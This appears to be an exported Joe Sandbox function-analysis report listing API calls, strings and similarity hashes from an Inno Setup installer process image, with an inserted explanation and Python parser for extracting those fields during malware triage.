                                                                                                                                                                                                                                  • API ID: Window$ActiveForeground
                                                                                                                                                                                                                                  • String ID: Will not restart Windows automatically.
                                                                                                                                                                                                                                  • API String ID: 307657957-4169339592
                                                                                                                                                                                                                                  • Opcode ID: ceb5e1da4dc76295146827fa9bc1951038eb8722099578625e3d3877b71a3664
                                                                                                                                                                                                                                  • Instruction ID: 4bdce942002d158aae482430f0c171f92fa141a3e9c551c877f01fd154286bbb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ceb5e1da4dc76295146827fa9bc1951038eb8722099578625e3d3877b71a3664
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F414870648240BFD321FF68DC92B6D3BE49718B09F6448B7E440573A2E37D9A059B1D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  APIs
• LocalFileTimeToFileTime.KERNEL32(?,?,?,00000000,00000000,004764DF,?,00000000,004764F0,?,00000000,00476539), ref: 004764B0
• SetFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,00000000,00000000,004764DF,?,00000000,004764F0,?,00000000,00476539), ref: 004764C4
Strings
• Extracting temporary file: , xrefs: 004763EC
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: FileTime$Local
• String ID: Extracting temporary file:
• API String ID: 791338737-4171118009
• Opcode ID: a80e35328548893b295efc7472ac722154afa94c34651c27e26e6e8334cb8313
• Instruction ID: 173659db1c42fed311bbc77dc24fc0b62308bfde4479aaaaa113f8cb774a82d8
• Opcode Fuzzy Hash: a80e35328548893b295efc7472ac722154afa94c34651c27e26e6e8334cb8313
• Instruction Fuzzy Hash: 9541B670E00649AFCB01DFA5C892AAFBBB9EB09704F51847AF814A7291D7789905CB58
Uniqueness
Uniqueness Score: -1.00%

Strings
• Failed to proceed to next wizard page; aborting., xrefs: 0046CD24
• Failed to proceed to next wizard page; showing wizard., xrefs: 0046CD38
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID:
• String ID: Failed to proceed to next wizard page; aborting.$Failed to proceed to next wizard page; showing wizard.
• API String ID: 0-1974262853
• Opcode ID: 7a25e1645a33cbe6e929f5c7beb1038c0aed19b3e354743701339651447d5c4b
• Instruction ID: bcb3787111d781b294161d03010f6e791927551fc3c7e501f8e48cd77162cd73
• Opcode Fuzzy Hash: 7a25e1645a33cbe6e929f5c7beb1038c0aed19b3e354743701339651447d5c4b
• Instruction Fuzzy Hash: A531C430604204DFD711EB59D9C5BA977F5EB06304F5500BBF448AB392D7786E40CB49
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
• RegCloseKey.ADVAPI32(?,00478F7E,?,?,00000001,00000000,00000000,00478F99), ref: 00478F67
Strings
• Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00478EF2
• %s\%s_is1, xrefs: 00478F10
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: CloseOpen
• String ID: %s\%s_is1$Software\Microsoft\Windows\CurrentVersion\Uninstall
• API String ID: 47109696-1598650737
• Opcode ID: 4390143081fa1cbfc05a77ab89ffad6b83c856e6c2d55465ffb8b64579313e9f
• Instruction ID: 4b2a563bf9abf46f4fe3d7c32e0d4fce195dfbf5fea183d3e913b06dd9c9918d
• Opcode Fuzzy Hash: 4390143081fa1cbfc05a77ab89ffad6b83c856e6c2d55465ffb8b64579313e9f
• Instruction Fuzzy Hash: EC218070B44244AFDB11DBA9CC45A9EBBF9EB8D704F90847BE408E7381DB789D018B58
Uniqueness
Uniqueness Score: -1.00%

APIs
• SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 004501FD
• ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0045022E
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: ExecuteMessageSendShell
• String ID: open
• API String ID: 812272486-2758837156
• Opcode ID: ea446b968c091deb5619fe0c64f284e9fafe3e6cb185d1fb8701354efc215884
• Instruction ID: 7f57506e0c07b49dd0b520b237e7736b759e9f4ed638734fb0c833ac5abbff07
• Opcode Fuzzy Hash: ea446b968c091deb5619fe0c64f284e9fafe3e6cb185d1fb8701354efc215884
• Instruction Fuzzy Hash: A1216074E00204AFDB10DFA9C896B9EBBF8EB44705F1081BAB404E7292D678DE45CA59
Uniqueness
Uniqueness Score: -1.00%

APIs
• ShellExecuteEx.SHELL32(0000003C), ref: 0045532C
• GetLastError.KERNEL32(0000003C,00000000,00455375,?,?,?), ref: 0045533D
  • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: DirectoryErrorExecuteLastShellSystem
• String ID: <
• API String ID: 893404051-4251816714
• Opcode ID: be62181711fdad770c23067a055a605ead6c89444dc6de91f0ff3b7559ccb240
• Instruction ID: 92df0b2f1231c5c49ece4c570041ef31d6ed92e86db86b93cafb864a5026e18c
• Opcode Fuzzy Hash: be62181711fdad770c23067a055a605ead6c89444dc6de91f0ff3b7559ccb240
• Instruction Fuzzy Hash: 172167B0600609ABDB10EF65C8926AE7BE8AF44355F54403AFC44E7291D7789E49CB98
Uniqueness
Uniqueness Score: -1.00%

APIs
• RtlEnterCriticalSection.KERNEL32(0049B420,00000000,)), ref: 004025C7
• RtlLeaveCriticalSection.KERNEL32(0049B420,0040263D), ref: 00402630
  • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,02108A1C,00003078,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
  • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,02108A1C,00003078,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
  • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,02108A1C,00003078,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
  • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,02108A1C,00003078,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: CriticalSection$EnterLeave$AllocInitializeLocal
• String ID: )
• API String ID: 2227675388-1084416617
• Opcode ID: e007287126da8fa7f668c9e0dd370e3762efe765c6f58c3167b97aa7cf6c64ab
• Instruction ID: 77bd95ba853a3ee3b707a504883d316aad751082ca23ba06a0d8aa2ba3da16af
• Opcode Fuzzy Hash: e007287126da8fa7f668c9e0dd370e3762efe765c6f58c3167b97aa7cf6c64ab
• Instruction Fuzzy Hash: E11104317042046FEB15AB796F5962B6AD4D795758B24087FF404F33D2DABD8C02929C
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00496B69
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Window
• String ID: /INITPROCWND=$%x $@
• API String ID: 2353593579-4169826103
• Opcode ID: 065ab22c92abacbd348a857e8389b224364e1a84b4d72130b6d36c29b0d142f9
• Instruction ID: 88b10d18150c6b9811cea3f3864e76c9cf3cbfb68c265b437af87b1fefc14b87
• Opcode Fuzzy Hash: 065ab22c92abacbd348a857e8389b224364e1a84b4d72130b6d36c29b0d142f9
• Instruction Fuzzy Hash: A3117231A042489FDF01DBA4E855BAEBFE8EB49314F51847BE504E7292EB3CA905C658
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
  • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
• SysFreeString.OLEAUT32(?), ref: 004474C6
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: String$AllocByteCharFreeMultiWide
• String ID: NIL Interface Exception$Unknown Method
• API String ID: 3952431833-1023667238
• Opcode ID: eaaa5532a95bbaa63f0b72a9291e33775e11d622c6162567185e6fee38e986d8
• Instruction ID: eb0132878ffe7144b3db707554455947565e11d0cdd4dc78092451a8fec87e99
• Opcode Fuzzy Hash: eaaa5532a95bbaa63f0b72a9291e33775e11d622c6162567185e6fee38e986d8
• Instruction Fuzzy Hash: 8011B9706082089FEB10DFA58C52A6EBBBCEB09704F91407AF504F7681D77C9D01CB69
Uniqueness

Uniqueness Score: -1.00%

APIs
• CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000,00496443), ref: 0049640E
• CloseHandle.KERNEL32(004964A8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000), ref: 00496425
  • Part of subcall function 004962F8: GetLastError.KERNEL32(00000000,00496390,?,?,?,?), ref: 0049631C
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: CloseCreateErrorHandleLastProcess
• String ID: 0nI
• API String ID: 3798668922-794067871
• Opcode ID: 9f8f3e3bd8d813766f30c87d8e8bb38219208be6823d56de1360ae23e0f090d4
• Instruction ID: 4379268ebcebee96409867e54b2437a6ba0b21f89d1dc4ba20584320bf55fb87
• Opcode Fuzzy Hash: 9f8f3e3bd8d813766f30c87d8e8bb38219208be6823d56de1360ae23e0f090d4
• Instruction Fuzzy Hash: 840182B1644248AFDB00EBD1DC42A9EBBACDF08704F51403AB904E7281D6785E008A2D
Uniqueness

Uniqueness Score: -1.00%
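The function-analysis blocks above (and the ones that follow) all share one text layout: an APIs section of "Name.MODULE(args), ref: address" lines, with "Part of subcall function X:" marking calls made by a callee rather than by the function itself, a Memory Dump Source section naming the dump and its associated regions, and a Similarity section whose "String ID" joins several literals with "$" (for instance "NIL Interface Exception$Unknown Method"). When triaging a report like this one, the usual job is to pull those fields out of many blocks so that the installer-runtime boilerplate (the "/INITPROCWND=" and "Inno Setup: No Icons" strings belong to the Inno Setup setup/uninstall stub) can be separated from the functions worth reversing, and so that the Opcode and Instruction IDs can be pivoted on across samples. The parser below is an added example written for this page, not Joe Sandbox code or tooling; the record and function names are my own, and the embedded sample is a constructed copy of two of the blocks on this page with the extraction whitespace and the web UI's "Download File" link text handled in the parser.

```python
"""Parse Joe Sandbox function-analysis text blocks into structured records.

Added example, not Joe Sandbox code. The layout (section headers, bullet
lines, "Name.MODULE(args), ref: addr" API lines, '$'-joined String IDs) is
taken from the listing on the page; class and function names are mine.
"""
import re
from dataclasses import dataclass, field


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: int              # address of the call site in the dumped image
    subcall_of: str = ""  # callee address when listed as "Part of subcall function X"


@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    fields: dict[str, str] = field(default_factory=dict)  # "API ID", "Opcode ID", ...
    associated: list[str] = field(default_factory=list)   # associated dump files

    @property
    def strings(self) -> list[str]:
        # The listing joins several literals with '$' (observed convention on the page).
        return [s for s in self.fields.get("String ID", "").split("$") if s]


API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)
KV_RE = re.compile(r"^(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin",
            "Similarity", "Uniqueness"}


def split_blocks(text: str) -> list[str]:
    """Each record ends with its 'Uniqueness Score' line."""
    blocks, cur = [], []
    for line in text.splitlines():
        cur.append(line)
        if line.strip().startswith("Uniqueness Score"):
            blocks.append("\n".join(cur))
            cur = []
    if any(l.strip() for l in cur):
        blocks.append("\n".join(cur))  # truncated trailing block is kept as-is
    return blocks


def parse_block(block: str) -> FunctionRecord:
    rec, section = FunctionRecord(), None
    for raw in block.splitlines():
        line = raw.strip().lstrip("•").strip()   # drop extraction indentation and bullets
        if not line:
            continue
        if line in SECTIONS:
            section = line
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:   # greedy args so a literal ')' argument (see the ')' String ID above) survives
                rec.apis.append(ApiCall(m["name"], m["module"], m["args"].split(","),
                                        int(m["ref"], 16), m["sub"] or ""))
            continue
        m = KV_RE.match(line)
        if not m:
            continue
        if m["key"] == "Associated":
            # "Download File" is link text from the web UI, not part of the dump name.
            rec.associated.append(m["val"].replace("Download File", "").strip())
        else:
            rec.fields[m["key"]] = m["val"]
    return rec


def direct_api_names(rec: FunctionRecord) -> list[str]:
    """APIs the function itself calls; sub-call lines belong to its callees."""
    return [a.name for a in rec.apis if not a.subcall_of]


# Constructed sample: two blocks copied from the listing on this page.
SAMPLE = """\
APIs
• CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000,00496443), ref: 0049640E
• CloseHandle.KERNEL32(004964A8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000), ref: 00496425
  • Part of subcall function 004962F8: GetLastError.KERNEL32(00000000,00496390,?,?,?,?), ref: 0049631C
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
Similarity
• API ID: CloseCreateErrorHandleLastProcess
• String ID: 0nI
• API String ID: 3798668922-794067871
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00496B69
Similarity
• API ID: Window
• String ID: /INITPROCWND=$%x $@
• API String ID: 2353593579-4169826103
Uniqueness

Uniqueness Score: -1.00%
"""

if __name__ == "__main__":
    for rec in map(parse_block, split_blocks(SAMPLE)):
        print(direct_api_names(rec), rec.strings, rec.fields.get("API String ID"))
```

Feed the whole saved report text to `split_blocks` and the records can be filtered by `direct_api_names` (a process-creating function that is not merely a caller of one), grouped by "API String ID", or matched on "Opcode ID" against another sample's listing. The sub-call distinction matters: `GetLastError` in the first sample block is attributed to callee 004962F8, so the function at 0049640E is reported as calling only `CreateProcessA` and `CloseHandle`.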

APIs
• RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DD78
• RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DDB8
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Value$EnumQuery
• String ID: Inno Setup: No Icons
• API String ID: 1576479698-2016326496
• Opcode ID: 36a0b08f46d91d09f38f531e186592c2a543f82488f0210131226a48688c00be
                                                                                                                                                                                                                                  • Instruction ID: 8d080c6700cf8453afd411d185ff7d2dd707f59376968ad674d2e7d16536e1ed
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 36a0b08f46d91d09f38f531e186592c2a543f82488f0210131226a48688c00be
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1B012B33B55B7179FB3045256D01F7B57889B82B60F64013BF942EA2C0D6999C04936E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

APIs
• SetFileAttributesA.KERNEL32(00000000,?,00000000,00452EE9,?,?,-00000001,?), ref: 00452EC3
• GetLastError.KERNEL32(00000000,?,00000000,00452EE9,?,?,-00000001,?), ref: 00452ECB
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: AttributesErrorFileLast
• String ID: T$H
• API String ID: 1799206407-488339322
• Opcode ID: 164a1123582fd7f8b9629d9128a54c78742dfc935cb603b92947040143095295
• Instruction ID: d2ab7b9b66ca24062e77e49c95e81f13ab46b8af1b1b2eb811bbb53637dcbd2b
• Opcode Fuzzy Hash: 164a1123582fd7f8b9629d9128a54c78742dfc935cb603b92947040143095295
• Instruction Fuzzy Hash: 86F0F971A04204AB8B01DB7A9D4249EB7ECEB8A32171045BBFC04E3642E7B84E048558
Uniqueness
Uniqueness Score: -1.00%

APIs
• RemoveDirectoryA.KERNEL32(00000000,00000000,00452E6D,?,-00000001,00000000), ref: 00452E47
• GetLastError.KERNEL32(00000000,00000000,00452E6D,?,-00000001,00000000), ref: 00452E4F
Strings
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: DirectoryErrorLastRemove
• String ID: T$H
• API String ID: 377330604-488339322
• Opcode ID: f20199e737e539a63e7b44ed2747663bd9db8366f39d7150388d1a26e91210d5
• Instruction ID: a8b2bafe79397aca91686f8656b478e2385adfe3b855dfce5f6cc0b9ba314abc
• Opcode Fuzzy Hash: f20199e737e539a63e7b44ed2747663bd9db8366f39d7150388d1a26e91210d5
• Instruction Fuzzy Hash: 70F0FC71A04708AFCF01EF759D4249EB7E8DB4E31575049B7FC14E3642E7785E048598
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0047D0CC: FreeLibrary.KERNEL32(6E290000,00481A2F), ref: 0047D0E2
  • Part of subcall function 0047CD9C: GetTickCount.KERNEL32 ref: 0047CDE6
  • Part of subcall function 00457294: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004572B3
• GetCurrentProcess.KERNEL32(00000001,?,?,?,?,0049895B), ref: 00498059
• TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,0049895B), ref: 0049805F
Strings
• Detected restart. Removing temporary directory., xrefs: 00498013
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
• String ID: Detected restart. Removing temporary directory.
• API String ID: 1717587489-3199836293
• Opcode ID: 281135f9a0ad5b4e488772808dcd9eaa6bf3b34c39f962a9f46887a4a11e3304
• Instruction ID: bb05712aa7eb36d303e19ffab6eef2c78f2a463723ea7eca767f41585c441369
• Opcode Fuzzy Hash: 281135f9a0ad5b4e488772808dcd9eaa6bf3b34c39f962a9f46887a4a11e3304
• Instruction Fuzzy Hash: BDE0E532208A406DDA1177BABC1396B7F5CDB46768B22487FF50882552D92D481CC53D
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000E.00000002.3152399986.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.3151924619.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3165005147.0000000000499000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3169997948.000000000049A000.00000008.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173068158.000000000049B000.00000004.00000001.01000000.0000000C.sdmp
• Associated: 0000000E.00000002.3173188413.00000000004AB000.00000002.00000001.01000000.0000000C.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_fwUkFVOLVOFs3NY104r7giRJ.jbxd
Similarity
• API ID: ErrorLastSleep
• String ID:
• API String ID: 1458359878-0
• Opcode ID: c5b77a215fef9e73284e25b888dd0379cf9cc52578839764909bbaa24cd021e3
• Instruction ID: f31041694d7e6b08a2ea33ec2b58b28b25921f40701f973673b956735a8b67d8
• Opcode Fuzzy Hash: c5b77a215fef9e73284e25b888dd0379cf9cc52578839764909bbaa24cd021e3
• Instruction Fuzzy Hash: 42F02B32705F58A78B21B56A889157FB2A8DB81366750012BFC0CD7313C878CC058BBC
Uniqueness
Uniqueness Score: -1.00%

Execution Graph

Execution Coverage: 17%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 5.1%
Total number of Nodes: 1258
Total number of Limit Nodes: 24
